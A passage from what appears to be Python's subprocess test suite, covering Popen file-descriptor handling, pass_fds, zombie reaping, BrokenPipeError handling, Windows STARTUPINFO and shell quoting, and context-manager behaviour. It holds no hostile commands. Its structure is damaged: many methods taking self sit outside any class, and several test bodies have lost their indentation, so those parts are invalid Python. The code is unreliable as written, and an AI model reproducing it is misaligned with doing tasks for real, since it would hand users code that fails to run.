        fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
        fds = os.pipe()
        self.addCleanup(os.close, fds[0])
        self.addCleanup(os.close, fds[1])
        open_fds = set(fds)
        # add a bunch more fds
        for _ in range(9):
            fd = os.open(os.devnull, os.O_RDONLY)
            self.addCleanup(os.close, fd)
            open_fds.add(fd)
        # Mark them inheritable so only close_fds controls their fate.
        for fd in open_fds:
            os.set_inheritable(fd, True)
        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=False)
        output, ignored = p.communicate()
        remaining_fds = set(map(int, output.split(b',')))
        self.assertEqual(remaining_fds & open_fds, open_fds,
                         "Some fds were closed")
        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=True)
        output, ignored = p.communicate()
        remaining_fds = set(map(int, output.split(b',')))
        self.assertFalse(remaining_fds & open_fds,
                         "Some fds were left open")
        self.assertIn(1, remaining_fds, "Subprocess failed")
        # Keep some of the fd's we opened open in the subprocess.
        # This tests _posixsubprocess.c's proper handling of fds_to_keep.
        fds_to_keep = set(open_fds.pop() for _ in range(8))
        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=True,
                             pass_fds=fds_to_keep)
        output, ignored = p.communicate()
        remaining_fds = set(map(int, output.split(b',')))
        self.assertFalse((remaining_fds - fds_to_keep) & open_fds,
                         "Some fds not in pass_fds were left open")
        self.assertIn(1, remaining_fds, "Subprocess failed")
@unittest.skipIf(sys.platform.startswith("freebsd") and
                 os.stat("/dev").st_dev == os.stat("/dev/fd").st_dev,
                 "Requires fdescfs mounted on /dev/fd on FreeBSD.")
def test_close_fds_when_max_fd_is_lowered(self):
    """Confirm that issue21618 is fixed (may fail under valgrind)."""
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    # This launches the meat of the test in a child process to
    # avoid messing with the larger unittest processes maximum
    # number of file descriptors.
    # This process launches:
    # +--> Process that lowers its RLIMIT_NOFILE after setting up
    #      a bunch of high open fds above the new lower rlimit.
    #      Those are reported via stdout before launching a new
    #      process with close_fds=False to run the actual test:
    #      +--> The TEST: This one launches a fd_status.py
    #        subprocess with close_fds=True so we can find out if
    #        any of the fds above the lowered rlimit are still open.
    p = subprocess.Popen([sys.executable, '-c', textwrap.dedent(
        '''
        import os, resource, subprocess, sys, textwrap
        open_fds = set()
        # Add a bunch more fds to pass down.
        for _ in range(40):
            fd = os.open(os.devnull, os.O_RDONLY)
            open_fds.add(fd)
        # Leave a two pairs of low ones available for use by the
        # internal child error pipe and the stdout pipe.
        # We also leave 10 more open as some Python buildbots run into
        # "too many open files" errors during the test if we do not.
        for fd in sorted(open_fds)[:14]:
            os.close(fd)
            open_fds.remove(fd)
        for fd in open_fds:
            #self.addCleanup(os.close, fd)
            os.set_inheritable(fd, True)
        max_fd_open = max(open_fds)
        # Communicate the open_fds to the parent unittest.TestCase process.
        print(','.join(map(str, sorted(open_fds))))
        sys.stdout.flush()
        rlim_cur, rlim_max = resource.getrlimit(resource.RLIMIT_NOFILE)
        try:
            # 29 is lower than the highest fds we are leaving open.
            resource.setrlimit(resource.RLIMIT_NOFILE, (29, rlim_max))
            # Launch a new Python interpreter with our low fd rlim_cur that
            # inherits open fds above that limit.  It then uses subprocess
            # with close_fds=True to get a report of open fds in the child.
            # An explicit list of fds to check is passed to fd_status.py as
            # letting fd_status rely on its default logic would miss the
            # fds above rlim_cur as it normally only checks up to that limit.
            subprocess.Popen(
                [sys.executable, '-c',
                 textwrap.dedent("""
                     import subprocess, sys
                     subprocess.Popen([sys.executable, %r] +
                                      [str(x) for x in range({max_fd})],
                                      close_fds=True).wait()
                     """.format(max_fd=max_fd_open+1))],
                close_fds=False).wait()
        finally:
            resource.setrlimit(resource.RLIMIT_NOFILE, (rlim_cur, rlim_max))
        ''' % fd_status)], stdout=subprocess.PIPE)

    output, unused_stderr = p.communicate()
    output_lines = output.splitlines()
    # Line 1: fds the helper left open; line 2: fds still open in the
    # grandchild.  Their intersection must be empty.
    self.assertEqual(len(output_lines), 2,
                     msg="expected exactly two lines of output:\n%r" % output)
    opened_fds = set(map(int, output_lines[0].strip().split(b',')))
    remaining_fds = set(map(int, output_lines[1].strip().split(b',')))

    self.assertFalse(remaining_fds & opened_fds,
                     msg="Some fds were left open.")
# Mac OS X Tiger (10.4) has a kernel bug: sometimes, the file
# descriptor of a pipe closed in the parent process is valid in the
# child process according to fstat(), but the mode of the file
# descriptor is invalid, and read or write raise an error.
@support.requires_mac_ver(10, 5)
def test_pass_fds(self):
    # pass_fds must keep exactly the listed fd open in the child and
    # close every other inherited fd when close_fds=True.
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    open_fds = set()
    # Create five inheritable pipe pairs to choose from.
    for x in range(5):
        fds = os.pipe()
        self.addCleanup(os.close, fds[0])
        self.addCleanup(os.close, fds[1])
        os.set_inheritable(fds[0], True)
        os.set_inheritable(fds[1], True)
        open_fds.update(fds)

    for fd in open_fds:
        p = subprocess.Popen([sys.executable, fd_status],
                             stdout=subprocess.PIPE, close_fds=True,
                             pass_fds=(fd, ))
        output, ignored = p.communicate()

        remaining_fds = set(map(int, output.split(b',')))
        to_be_closed = open_fds - {fd}

        self.assertIn(fd, remaining_fds, "fd to be passed not passed")
        self.assertFalse(remaining_fds & to_be_closed,
                         "fd to be closed passed")

        # pass_fds overrides close_fds with a warning.
        with self.assertWarns(RuntimeWarning) as context:
            self.assertFalse(subprocess.call(
                [sys.executable, "-c", "import sys; sys.exit(0)"],
                close_fds=False, pass_fds=(fd, )))
        self.assertIn('overriding close_fds', str(context.warning))
def test_pass_fds_inheritable(self):
    # pass_fds must make non-inheritable fds inheritable in the child
    # (after fork, before exec) without changing the parent's flags.
    script = support.findfile("fd_status.py", subdir="subprocessdata")

    inheritable, non_inheritable = os.pipe()
    self.addCleanup(os.close, inheritable)
    self.addCleanup(os.close, non_inheritable)
    os.set_inheritable(inheritable, True)
    os.set_inheritable(non_inheritable, False)
    pass_fds = (inheritable, non_inheritable)
    args = [sys.executable, script]
    args += list(map(str, pass_fds))

    p = subprocess.Popen(args,
                         stdout=subprocess.PIPE, close_fds=True,
                         pass_fds=pass_fds)
    output, ignored = p.communicate()
    fds = set(map(int, output.split(b',')))

    # the inheritable file descriptor must be inherited, so its inheritable
    # flag must be set in the child process after fork() and before exec()
    self.assertEqual(fds, set(pass_fds), "output=%a" % output)

    # inheritable flag must not be changed in the parent process
    self.assertEqual(os.get_inheritable(inheritable), True)
    self.assertEqual(os.get_inheritable(non_inheritable), False)
def test_stdout_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stdin=inout)
p.wait()
def test_stdout_stderr_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stdout=inout, stderr=inout)
p.wait()
def test_stderr_stdin_are_single_inout_fd(self):
with io.open(os.devnull, "r+") as inout:
p = subprocess.Popen([sys.executable, "-c", "import sys; sys.exit(0)"],
stderr=inout, stdin=inout)
p.wait()
def test_wait_when_sigchild_ignored(self):
    # The child script sets SIGCHLD to SIG_IGN and then spawns its own
    # subprocess; wait()/communicate() must still reap it correctly.
    # NOTE: sigchild_ignore.py may not be an effective test on all OSes.
    sigchild_ignore = support.findfile("sigchild_ignore.py",
                                       subdir="subprocessdata")
    p = subprocess.Popen([sys.executable, sigchild_ignore],
                         stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    stdout, stderr = p.communicate()
    self.assertEqual(0, p.returncode, "sigchild_ignore.py exited"
                     " non-zero with this error:\n%s" %
                     stderr.decode('utf-8'))
def test_select_unbuffered(self):
    # Issue #11459: bufsize=0 should really set the pipes as
    # unbuffered (and therefore let select() work properly).
    select = support.import_module("select")
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys;'
                          'sys.stdout.write("apple")'],
                         stdout=subprocess.PIPE,
                         bufsize=0)
    f = p.stdout
    self.addCleanup(f.close)
    try:
        # A partial read must not buffer the remainder; the leftover byte
        # has to stay visible to select() immediately.
        self.assertEqual(f.read(4), b"appl")
        self.assertIn(f, select.select([f], [], [], 0.0)[0])
    finally:
        p.wait()
def test_zombie_fast_process_del(self):
    # Issue #12650: on Unix, if Popen.__del__() was called before the
    # process exited, it wouldn't be added to subprocess._active, and would
    # remain a zombie.
    # spawn a Popen, and delete its reference before it exits
    p = subprocess.Popen([sys.executable, "-c",
                          'import sys, time;'
                          'time.sleep(0.2)'],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    ident = id(p)
    pid = p.pid
    # Dropping the last reference triggers __del__ (and a ResourceWarning
    # because the child is still running).
    with support.check_warnings(('', ResourceWarning)):
        p = None

    # check that p is in the active processes list
    self.assertIn(ident, [id(o) for o in subprocess._active])
def test_leak_fast_process_del_killed(self):
    # Issue #12650: on Unix, if Popen.__del__() was called before the
    # process exited, and the process got killed by a signal, it would never
    # be removed from subprocess._active, which triggered a FD and memory
    # leak.
    # spawn a Popen, delete its reference and kill it
    p = subprocess.Popen([sys.executable, "-c",
                          'import time;'
                          'time.sleep(3)'],
                         stdout=subprocess.PIPE,
                         stderr=subprocess.PIPE)
    self.addCleanup(p.stdout.close)
    self.addCleanup(p.stderr.close)
    ident = id(p)
    pid = p.pid
    with support.check_warnings(('', ResourceWarning)):
        p = None

    os.kill(pid, signal.SIGKILL)
    # check that p is in the active processes list
    self.assertIn(ident, [id(o) for o in subprocess._active])

    # let some time for the process to exit, and create a new Popen: this
    # should trigger the wait() of p
    time.sleep(0.2)
    with self.assertRaises(OSError):
        with subprocess.Popen(NONEXISTING_CMD,
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE) as proc:
            pass
    # p should have been wait()ed on, and removed from the _active list
    self.assertRaises(OSError, os.waitpid, pid, 0)
    self.assertNotIn(ident, [id(o) for o in subprocess._active])
def test_close_fds_after_preexec(self):
    # close_fds must run AFTER preexec_fn, so an fd the preexec function
    # dup2()s onto is still closed in the exec'd child.
    fd_status = support.findfile("fd_status.py", subdir="subprocessdata")

    # this FD is used as dup2() target by preexec_fn, and should be closed
    # in the child process
    fd = os.dup(1)
    self.addCleanup(os.close, fd)

    p = subprocess.Popen([sys.executable, fd_status],
                         stdout=subprocess.PIPE, close_fds=True,
                         preexec_fn=lambda: os.dup2(1, fd))
    output, ignored = p.communicate()

    remaining_fds = set(map(int, output.split(b',')))

    self.assertNotIn(fd, remaining_fds)
@support.cpython_only
def test_fork_exec(self):
    # Issue #22290: fork_exec() must not crash on memory allocation failure
    # or other errors
    import _posixsubprocess
    gc_enabled = gc.isenabled()
    try:
        # Use a preexec function and enable the garbage collector
        # to force fork_exec() to re-enable the garbage collector
        # on error.
        func = lambda: None
        gc.enable()

        # Each tuple substitutes one argument with a wrong type (123);
        # fork_exec() must raise TypeError rather than crash.
        for args, exe_list, cwd, env_list in (
            (123,      [b"exe"], None, [b"env"]),
            ([b"arg"], 123,      None, [b"env"]),
            ([b"arg"], [b"exe"], 123,  [b"env"]),
            ([b"arg"], [b"exe"], None, 123),
        ):
            with self.assertRaises(TypeError):
                _posixsubprocess.fork_exec(
                    args, exe_list,
                    True, (), cwd, env_list,
                    -1, -1, -1, -1,
                    1, 2, 3, 4,
                    True, True, func)
    finally:
        # Restore the caller's GC state.
        if not gc_enabled:
            gc.disable()
@support.cpython_only
def test_fork_exec_sorted_fd_sanity_check(self):
    # Issue #23564: sanity check the fork_exec() fds_to_keep sanity check.
    import _posixsubprocess

    class BadInt:
        # Converts successfully once, then raises: exercises the error
        # path where conversion fails mid-validation.
        first = True
        def __init__(self, value):
            self.value = value
        def __int__(self):
            if self.first:
                self.first = False
                return self.value
            raise ValueError

    gc_enabled = gc.isenabled()
    try:
        gc.enable()

        for fds_to_keep in (
            (-1, 2, 3, 4, 5),     # Negative number.
            ('str', 4),           # Not an int.
            (18, 23, 42, 2**63),  # Out of range.
            (5, 4),               # Not sorted.
            (6, 7, 7, 8),         # Duplicate.
            (BadInt(1), BadInt(2)),
        ):
            with self.assertRaises(
                    ValueError,
                    msg='fds_to_keep={}'.format(fds_to_keep)) as c:
                _posixsubprocess.fork_exec(
                    [b"false"], [b"false"],
                    True, fds_to_keep, None, [b"env"],
                    -1, -1, -1, -1,
                    1, 2, 3, 4,
                    True, True, None)
            self.assertIn('fds_to_keep', str(c.exception))
    finally:
        if not gc_enabled:
            gc.disable()
def test_communicate_BrokenPipeError_stdin_close(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
proc.communicate() # Should swallow BrokenPipeError from close.
mock_proc_stdin.close.assert_called_with()
def test_communicate_BrokenPipeError_stdin_write(self):
# By not setting stdout or stderr or a timeout we force the fast path
# that just calls _stdin_write() internally due to our mock.
proc = subprocess.Popen([sys.executable, '-c', 'pass'])
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.write.side_effect = BrokenPipeError
proc.communicate(b'stuff') # Should swallow the BrokenPipeError.
mock_proc_stdin.write.assert_called_once_with(b'stuff')
mock_proc_stdin.close.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_flush(self):
    # Setting stdin and stdout forces the ._communicate() code path.
    # python -h exits faster than python -c pass (but spams stdout).
    proc = subprocess.Popen([sys.executable, '-h'],
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE)
    with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin, \
            open(os.devnull, 'wb') as dev_null:
        mock_proc_stdin.flush.side_effect = BrokenPipeError
        # because _communicate registers a selector using proc.stdin...
        # give the mock a real fd so registration succeeds.
        mock_proc_stdin.fileno.return_value = dev_null.fileno()
        # _communicate() should swallow BrokenPipeError from flush.
        proc.communicate(b'stuff')
        mock_proc_stdin.flush.assert_called_once_with()
def test_communicate_BrokenPipeError_stdin_close_with_timeout(self):
# Setting stdin and stdout forces the ._communicate() code path.
# python -h exits faster than python -c pass (but spams stdout).
proc = subprocess.Popen([sys.executable, '-h'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE)
with proc, mock.patch.object(proc, 'stdin') as mock_proc_stdin:
mock_proc_stdin.close.side_effect = BrokenPipeError
# _communicate() should swallow BrokenPipeError from close.
proc.communicate(timeout=999)
mock_proc_stdin.close.assert_called_once_with()
@unittest.skipUnless(_testcapi is not None
                     and hasattr(_testcapi, 'W_STOPCODE'),
                     'need _testcapi.W_STOPCODE')
def test_stopped(self):
    """Test wait() behavior when waitpid returns WIFSTOPPED; issue29335."""
    args = [sys.executable, '-c', 'pass']
    proc = subprocess.Popen(args)

    # Wait until the real process completes to avoid zombie process
    pid = proc.pid
    pid, status = os.waitpid(pid, 0)
    self.assertEqual(status, 0)

    # Fake a "stopped with signal 3" status on the next waitpid call;
    # wait() must report it as returncode -3.
    status = _testcapi.W_STOPCODE(3)
    with mock.patch('subprocess.os.waitpid', return_value=(pid, status)):
        returncode = proc.wait()

    self.assertEqual(returncode, -3)
@unittest.skipUnless(mswindows, "Windows specific tests")
class Win32ProcessTestCase(BaseTestCase):
    """Windows-only Popen behavior: STARTUPINFO handling, creationflags,
    shell invocation, handle inheritance, and terminate/kill semantics."""

    def test_startupinfo(self):
        # startupinfo argument
        # We use hardcoded constants, because we do not want to
        # depend on win32all.
        STARTF_USESHOWWINDOW = 1
        SW_MAXIMIZE = 3
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.dwFlags = STARTF_USESHOWWINDOW
        startupinfo.wShowWindow = SW_MAXIMIZE
        # Since Python is a console process, it won't be affected
        # by wShowWindow, but the argument should be silently
        # ignored
        subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
                        startupinfo=startupinfo)

    def test_startupinfo_keywords(self):
        # startupinfo argument passed as constructor keywords this time.
        # We use hardcoded constants, because we do not want to
        # depend on win32all.
        # NOTE(review): the local name is a misspelling of
        # STARTF_USESHOWWINDOW; the value (1) is correct — rename candidate.
        STARTF_USERSHOWWINDOW = 1
        SW_MAXIMIZE = 3
        startupinfo = subprocess.STARTUPINFO(
            dwFlags=STARTF_USERSHOWWINDOW,
            wShowWindow=SW_MAXIMIZE
        )
        # Since Python is a console process, it won't be affected
        # by wShowWindow, but the argument should be silently
        # ignored
        subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
                        startupinfo=startupinfo)

    def test_creationflags(self):
        # creationflags argument
        CREATE_NEW_CONSOLE = 16
        sys.stderr.write(" a DOS box should flash briefly ...\n")
        subprocess.call(sys.executable +
                        ' -c "import time; time.sleep(0.25)"',
                        creationflags=CREATE_NEW_CONSOLE)

    def test_invalid_args(self):
        # invalid arguments should raise ValueError
        # (preexec_fn is POSIX-only and must be rejected on Windows)
        self.assertRaises(ValueError, subprocess.call,
                          [sys.executable, "-c",
                           "import sys; sys.exit(47)"],
                          preexec_fn=lambda: 1)

    @support.cpython_only
    def test_issue31471(self):
        # There shouldn't be an assertion failure in Popen() in case the env
        # argument has a bad keys() method.
        class BadEnv(dict):
            keys = None
        with self.assertRaises(TypeError):
            subprocess.Popen([sys.executable, "-c", "pass"], env=BadEnv())

    def test_close_fds(self):
        # close file descriptors
        rc = subprocess.call([sys.executable, "-c",
                              "import sys; sys.exit(47)"],
                             close_fds=True)
        self.assertEqual(rc, 47)

    def test_close_fds_with_stdio(self):
        import msvcrt

        fds = os.pipe()
        self.addCleanup(os.close, fds[0])
        self.addCleanup(os.close, fds[1])

        handles = []
        for fd in fds:
            os.set_inheritable(fd, True)
            handles.append(msvcrt.get_osfhandle(fd))

        # close_fds=False: the inherited handle stays usable in the child.
        p = subprocess.Popen([sys.executable, "-c",
                              "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                             stdout=subprocess.PIPE, close_fds=False)
        stdout, stderr = p.communicate()
        self.assertEqual(p.returncode, 0)
        int(stdout.strip())  # Check that stdout is an integer

        # close_fds=True: the handle is not inherited; the child fails.
        p = subprocess.Popen([sys.executable, "-c",
                              "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE, close_fds=True)
        stdout, stderr = p.communicate()
        self.assertEqual(p.returncode, 1)
        self.assertIn(b"OSError", stderr)

        # The same as the previous call, but with an empty handle_list
        handle_list = []
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.lpAttributeList = {"handle_list": handle_list}
        p = subprocess.Popen([sys.executable, "-c",
                              "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                             stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                             startupinfo=startupinfo, close_fds=True)
        stdout, stderr = p.communicate()
        self.assertEqual(p.returncode, 1)
        self.assertIn(b"OSError", stderr)

        # Check for a warning due to using handle_list and close_fds=False
        with support.check_warnings((".*overriding close_fds", RuntimeWarning)):
            startupinfo = subprocess.STARTUPINFO()
            startupinfo.lpAttributeList = {"handle_list": handles[:]}
            p = subprocess.Popen([sys.executable, "-c",
                                  "import msvcrt; print(msvcrt.open_osfhandle({}, 0))".format(handles[0])],
                                 stdout=subprocess.PIPE, stderr=subprocess.PIPE,
                                 startupinfo=startupinfo, close_fds=False)
            stdout, stderr = p.communicate()
            self.assertEqual(p.returncode, 0)

    def test_empty_attribute_list(self):
        # An empty lpAttributeList must be accepted.
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.lpAttributeList = {}
        subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
                        startupinfo=startupinfo)

    def test_empty_handle_list(self):
        # An explicit empty handle_list must be accepted.
        startupinfo = subprocess.STARTUPINFO()
        startupinfo.lpAttributeList = {"handle_list": []}
        subprocess.call([sys.executable, "-c", "import sys; sys.exit(0)"],
                        startupinfo=startupinfo)

    def test_shell_sequence(self):
        # Run command through the shell (sequence)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen(["set"], shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        with p:
            self.assertIn(b"physalis", p.stdout.read())

    def test_shell_string(self):
        # Run command through the shell (string)
        newenv = os.environ.copy()
        newenv["FRUIT"] = "physalis"
        p = subprocess.Popen("set", shell=1,
                             stdout=subprocess.PIPE,
                             env=newenv)
        with p:
            self.assertIn(b"physalis", p.stdout.read())

    def test_shell_encodings(self):
        # Run command through the shell (string), decoding the output with
        # each of the Windows console code-page aliases.
        for enc in ['ansi', 'oem']:
            newenv = os.environ.copy()
            newenv["FRUIT"] = "physalis"
            p = subprocess.Popen("set", shell=1,
                                 stdout=subprocess.PIPE,
                                 env=newenv,
                                 encoding=enc)
            with p:
                self.assertIn("physalis", p.stdout.read(), enc)

    def test_call_string(self):
        # call() function with string argument on Windows
        rc = subprocess.call(sys.executable +
                             ' -c "import sys; sys.exit(47)"')
        self.assertEqual(rc, 47)

    def _kill_process(self, method, *args):
        # Start a long-running child, apply the given kill method while it
        # is alive, and check it died with a non-zero return code.
        # Some win32 buildbot raises EOFError if stdin is inherited
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                 import sys, time
                 sys.stdout.write('x\\n')
                 sys.stdout.flush()
                 time.sleep(30)
                 """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        with p:
            # Wait for the interpreter to be completely initialized before
            # sending any signal.
            p.stdout.read(1)
            getattr(p, method)(*args)
            _, stderr = p.communicate()
            self.assertStderrEqual(stderr, b'')
            returncode = p.wait()
        self.assertNotEqual(returncode, 0)

    def _kill_dead_process(self, method, *args):
        # Apply the kill method AFTER the child has already exited; the
        # call must not raise, and the original exit code is preserved.
        p = subprocess.Popen([sys.executable, "-c", """if 1:
                 import sys, time
                 sys.stdout.write('x\\n')
                 sys.stdout.flush()
                 sys.exit(42)
                 """],
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        with p:
            # Wait for the interpreter to be completely initialized before
            # sending any signal.
            p.stdout.read(1)
            # The process should end after this
            time.sleep(1)
            # This shouldn't raise even though the child is now dead
            getattr(p, method)(*args)
            _, stderr = p.communicate()
            self.assertStderrEqual(stderr, b'')
            rc = p.wait()
        self.assertEqual(rc, 42)

    def test_send_signal(self):
        self._kill_process('send_signal', signal.SIGTERM)

    def test_kill(self):
        self._kill_process('kill')

    def test_terminate(self):
        self._kill_process('terminate')

    def test_send_signal_dead(self):
        self._kill_dead_process('send_signal', signal.SIGTERM)

    def test_kill_dead(self):
        self._kill_dead_process('kill')

    def test_terminate_dead(self):
        self._kill_dead_process('terminate')
class MiscTests(unittest.TestCase):
    """Tests that don't fit the Popen-per-platform cases: KeyboardInterrupt
    cleanup behavior, the getoutput helpers, and __all__ hygiene."""

    class RecordingPopen(subprocess.Popen):
        """A Popen that saves a reference to each instance for testing."""
        instances_created = []

        def __init__(self, *args, **kwargs):
            super().__init__(*args, **kwargs)
            self.instances_created.append(self)

    @mock.patch.object(subprocess.Popen, "_communicate")
    def _test_keyboardinterrupt_no_kill(self, popener, mock__communicate,
                                        **kwargs):
        """Fake a SIGINT happening during Popen._communicate() and ._wait().

        This avoids the need to actually try and get test environments to send
        and receive signals reliably across platforms.  The net effect of a ^C
        happening during a blocking subprocess execution which we want to clean
        up from is a KeyboardInterrupt coming out of communicate() or wait().
        """
        mock__communicate.side_effect = KeyboardInterrupt
        try:
            with mock.patch.object(subprocess.Popen, "_wait") as mock__wait:
                # We patch out _wait() as no signal was involved so the
                # child process isn't actually going to exit rapidly.
                mock__wait.side_effect = KeyboardInterrupt
                with mock.patch.object(subprocess, "Popen",
                                       self.RecordingPopen):
                    with self.assertRaises(KeyboardInterrupt):
                        popener([sys.executable, "-c",
                                 "import time\ntime.sleep(9)\nimport sys\n"
                                 "sys.stderr.write('\\n!runaway child!\\n')"],
                                stdout=subprocess.DEVNULL, **kwargs)
                # After the ^C, cleanup may wait briefly but must never block
                # forever on the (still running) child.
                for call in mock__wait.call_args_list[1:]:
                    self.assertNotEqual(
                        call, mock.call(timeout=None),
                        "no open-ended wait() after the first allowed: "
                        f"{mock__wait.call_args_list}")
                sigint_calls = []
                for call in mock__wait.call_args_list:
                    if call == mock.call(timeout=0.25):  # from Popen.__init__
                        sigint_calls.append(call)
                self.assertLessEqual(mock__wait.call_count, 2,
                                     msg=mock__wait.call_args_list)
                self.assertEqual(len(sigint_calls), 1,
                                 msg=mock__wait.call_args_list)
        finally:
            # cleanup the forgotten (due to our mocks) child process
            process = self.RecordingPopen.instances_created.pop()
            process.kill()
            process.wait()
            self.assertEqual([], self.RecordingPopen.instances_created)

    def test_call_keyboardinterrupt_no_kill(self):
        self._test_keyboardinterrupt_no_kill(subprocess.call, timeout=6.282)

    def test_run_keyboardinterrupt_no_kill(self):
        self._test_keyboardinterrupt_no_kill(subprocess.run, timeout=6.282)

    def test_context_manager_keyboardinterrupt_no_kill(self):
        def popen_via_context_manager(*args, **kwargs):
            with subprocess.Popen(*args, **kwargs) as unused_process:
                raise KeyboardInterrupt  # Test how __exit__ handles ^C.
        self._test_keyboardinterrupt_no_kill(popen_via_context_manager)

    def test_getoutput(self):
        self.assertEqual(subprocess.getoutput('echo xyzzy'), 'xyzzy')
        self.assertEqual(subprocess.getstatusoutput('echo xyzzy'),
                         (0, 'xyzzy'))

        # we use mkdtemp in the next line to create an empty directory
        # under our exclusive control; from that, we can invent a pathname
        # that we _know_ won't exist.  This is guaranteed to fail.
        dir = None  # NOTE(review): shadows the builtin `dir` — rename candidate.
        try:
            dir = tempfile.mkdtemp()
            name = os.path.join(dir, "foo")
            status, output = subprocess.getstatusoutput(
                ("type " if mswindows else "cat ") + name)
            self.assertNotEqual(status, 0)
        finally:
            if dir is not None:
                os.rmdir(dir)

    def test__all__(self):
        """Ensure that __all__ is populated properly."""
        intentionally_excluded = {"list2cmdline", "Handle"}
        exported = set(subprocess.__all__)
        possible_exports = set()
        import types
        for name, value in subprocess.__dict__.items():
            if name.startswith('_'):
                continue
            if isinstance(value, (types.ModuleType,)):
                continue
            possible_exports.add(name)
        self.assertEqual(exported, possible_exports - intentionally_excluded)
@unittest.skipUnless(hasattr(selectors, 'PollSelector'),
                     "Test needs selectors.PollSelector")
class ProcessTestCaseNoPoll(ProcessTestCase):
    """Re-run the entire ProcessTestCase suite with the select()-based
    selector forced in place of the default poll()-based one."""

    def setUp(self):
        # Remember the selector in use so tearDown can restore it.
        self.orig_selector = subprocess._PopenSelector
        subprocess._PopenSelector = selectors.SelectSelector
        super().setUp()

    def tearDown(self):
        subprocess._PopenSelector = self.orig_selector
        super().tearDown()
@unittest.skipUnless(mswindows, "Windows-specific tests")
class CommandsWithSpaces (BaseTestCase):
    """Windows quoting: commands and script paths containing spaces must
    round-trip through both shell and non-shell invocation."""

    def setUp(self):
        super().setUp()
        # Create a throwaway script whose filename contains a space
        # ("te st..."); it echoes argc and the lowercased argv.
        f, fname = tempfile.mkstemp(".py", "te st")
        self.fname = fname.lower()
        os.write(f, b"import sys;"
                    b"sys.stdout.write('%d %s' % (len(sys.argv), [a.lower () for a in sys.argv]))"
                 )
        os.close(f)

    def tearDown(self):
        os.remove(self.fname)
        super().tearDown()

    def with_spaces(self, *args, **kwargs):
        # Run the space-laden script and check argv arrived intact:
        # exactly two args, the script path and the literal "ab cd".
        kwargs['stdout'] = subprocess.PIPE
        p = subprocess.Popen(*args, **kwargs)
        with p:
            self.assertEqual(
                p.stdout.read().decode("mbcs"),
                "2 [%r, 'ab cd']" % self.fname
            )

    def test_shell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"), shell=1)

    def test_shell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"], shell=1)

    def test_noshell_string_with_spaces(self):
        # call() function with string argument with spaces on Windows
        self.with_spaces('"%s" "%s" "%s"' % (sys.executable, self.fname,
                                             "ab cd"))

    def test_noshell_sequence_with_spaces(self):
        # call() function with sequence argument with spaces on Windows
        self.with_spaces([sys.executable, self.fname, "ab cd"])
class ContextManagerTests(BaseTestCase):
    """Popen as a context manager: pipes are closed, wait() is called, and
    errors during __exit__ are propagated sensibly."""

    def test_pipe(self):
        # __exit__ must close both pipe file objects.
        with subprocess.Popen([sys.executable, "-c",
                               "import sys;"
                               "sys.stdout.write('stdout');"
                               "sys.stderr.write('stderr');"],
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE) as proc:
            self.assertEqual(proc.stdout.read(), b"stdout")
            self.assertStderrEqual(proc.stderr.read(), b"stderr")

        self.assertTrue(proc.stdout.closed)
        self.assertTrue(proc.stderr.closed)

    def test_returncode(self):
        with subprocess.Popen([sys.executable, "-c",
                               "import sys; sys.exit(100)"]) as proc:
            pass
        # __exit__ calls wait(), so the returncode should be set
        self.assertEqual(proc.returncode, 100)

    def test_communicate_stdin(self):
        # The child exits with 1 iff stdin delivered exactly 'context'.
        with subprocess.Popen([sys.executable, "-c",
                               "import sys;"
                               "sys.exit(sys.stdin.read() == 'context')"],
                              stdin=subprocess.PIPE) as proc:
            proc.communicate(b"context")
            self.assertEqual(proc.returncode, 1)

    def test_invalid_args(self):
        # A spawn failure must propagate out of the with-statement.
        with self.assertRaises(NONEXISTING_ERRORS):
            with subprocess.Popen(NONEXISTING_CMD,
                                  stdout=subprocess.PIPE,
